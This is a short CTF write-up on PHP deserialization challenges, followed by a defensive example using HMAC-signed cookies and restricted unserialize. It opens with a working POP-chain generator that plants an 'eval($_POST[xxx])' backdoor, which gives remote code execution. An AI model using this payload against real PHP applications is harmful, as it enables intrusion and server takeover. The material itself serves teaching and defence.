<?php
class ctfShowUser{
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    private $code = 'eval($_POST[xxx]);';
    public function getInfo(){
        eval($this->code);
    }
}
$user = new ctfShowUser();
echo urlencode(serialize($user));
// O%3A11%3A%22...
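A class ctfshowuser is defined, with three variables and three functions. This challenge only requires making the isVip variable true, which happens when the submitted username and password equal the values originally defined in the class.
payload: username=xxxxxx&password=xxxxxx
2.web255
This challenge requires passing the value in a cookie so that isVip becomes true, and the value must be serialized.
payload: passed in via the cookie, with a GET request username=xxxxxx&...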
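The mitigation side of both snippets above, as an added example that is not part of the original write-up or the challenge source: client state travels as HMAC-signed JSON instead of a serialized object, so a client cannot flip isVip, and any legacy unserialize() call refuses to instantiate classes. SECRET_KEY, issueCookie, readCookie and Gadget are hypothetical names.

```php
<?php
// Added example; SECRET_KEY, issueCookie, readCookie and Gadget are hypothetical names.
const SECRET_KEY = 'constructed-demo-key'; // assumption: really loaded from server-side config

// Cookie value = base64(JSON claims) . "." . HMAC-SHA256 tag over the base64 body.
function issueCookie(array $claims): string {
    $body = base64_encode(json_encode($claims, JSON_THROW_ON_ERROR));
    return $body . '.' . hash_hmac('sha256', $body, SECRET_KEY);
}

// Returns the claims only when the tag verifies; never calls unserialize().
function readCookie(string $cookie): ?array {
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) { return null; }
    [$body, $tag] = $parts;
    if (!hash_equals(hash_hmac('sha256', $body, SECRET_KEY), $tag)) {
        return null; // constant-time compare failed: body was altered
    }
    $json = base64_decode($body, true);
    if ($json === false) { return null; }
    try {
        $claims = json_decode($json, true, 8, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        return null;
    }
    return is_array($claims) ? $claims : null;
}

// Constructed sample: a cookie the server issued for a non-VIP user.
$good = issueCookie(['username' => 'alice', 'isVip' => false]);
var_dump(readCookie($good));

// Client swaps the body for one with isVip=true but keeps the old tag: rejected.
$body = base64_encode(json_encode(['username' => 'alice', 'isVip' => true]));
var_dump(readCookie($body . strstr($good, '.')));

// Legacy serialized input: allowed_classes=false yields __PHP_Incomplete_Class,
// so magic methods such as __wakeup() on application classes never run.
class Gadget { public function __wakeup() { echo "gadget ran\n"; } }
$obj = unserialize('O:6:"Gadget":0:{}', ['allowed_classes' => false]);
var_dump($obj instanceof __PHP_Incomplete_Class);
```

Requires PHP 7.3 or later for JSON_THROW_ON_ERROR; authorization flags such as isVip are better kept in server-side session state than in any client-held value.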